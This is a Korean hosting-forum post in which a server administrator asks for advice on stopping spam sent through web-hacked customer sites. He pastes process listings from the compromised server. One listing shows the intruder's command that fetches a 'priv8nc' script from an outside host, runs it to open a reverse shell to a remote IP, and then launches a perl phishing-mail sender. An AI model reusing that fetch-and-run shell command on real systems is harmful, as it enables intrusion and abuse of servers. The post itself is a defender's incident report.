웹해킹을 통한 스팸메일 발송 문제
작성자 정보
- 씨큐 작성
- 작성일
컨텐츠 정보
- 2,720 조회
- 0 추천
- 목록
본문
안녕하십니까? 항상 도움을 주셔서 감사히 생각하고 있습니다.
제로보드를 통한 웹해킹과 awstats 취약점을 통한 웹해킹이 많아져서..
/var/tmp, /tmp, /dev/shm 파티션의 보안설정을 했습니다.
이후 다른 방법을 이용해 스팸메일을 발송하는 사례가 늘고 있는것 같아 문의 드립니다.
[root@ns1 clientmqueue]# cat /etc/redhat-release
Fedora Core release 3 (Heidelberg)
[root@ns1 clientmqueue]# uname -a
Linux ns1.webhostingkorea.com 2.6.11-1.27_FC3smp #1 SMP Tue May 17 20:43:11 EDT 2005 i686 i686 i386 GNU/Linux
[root@ns1 clientmqueue]#
[root@ns1 logs]# pstree
init-+-ahd_dv_0
|-sh---perl---sh---sh---perl---sendmail <= 수상한 프로세스
[root@ns1 logs]# ps -ef
nobody 397 1 0 Jul22 ? 00:00:00 sh -c cd /tmp;wget www.bh-net.dk/priv8nc;lynx -source www.bh-net.dk/priv8nc >> priv8nc;curl www.bh-net.dk/priv8nc > priv8nc;perl priv8nc 201.8.188.64 2232 2>&1nobody 402 397 0 Jul22 ? 00:00:00 perl priv8nc 201.8.188.64 2232nobody 439 402 0 Jul22 ? 00:00:00 sh -c echo "`uname -a`";echo "`id`";echo "`uptime`";echo "`pwd`";/bin/shnobody 447 439 0 Jul22 ? 00:00:00 /bin/sh
nobody 29107 447 0 Jul25 ? 00:01:26 perl snd.txt lista7.txt cobranca@serasa.com.br Pend?ncias Financeiras serasa1.htm
위와같이 sh 와 perl 을 통하여 서버에 /tmp 로 업로드한 파일을 실행 시키네요..
물론 제로보드 취약점 패치나, awstats 버전 업그레이드를 통해 막을수 있는건 알고 있습니다.
그러나 수많은 고객에게 일일이 통보를 해도 고객측에서 해결을 잘 하지 않는것 같네요.
서버차원에서 해결할수 있는방법을 찾고 있는데..잘 몰라서 질문을 드립니다.
고수님들의 많은 조언 부탁드립니다.
감사합니다.
ps. chmod 700 /usr/bin/perl 을 하여 perl 을 사용하지 못하게 한다면 다른 웹서비스에 영향이 있겠죠?
관련자료
-
이전
-
다음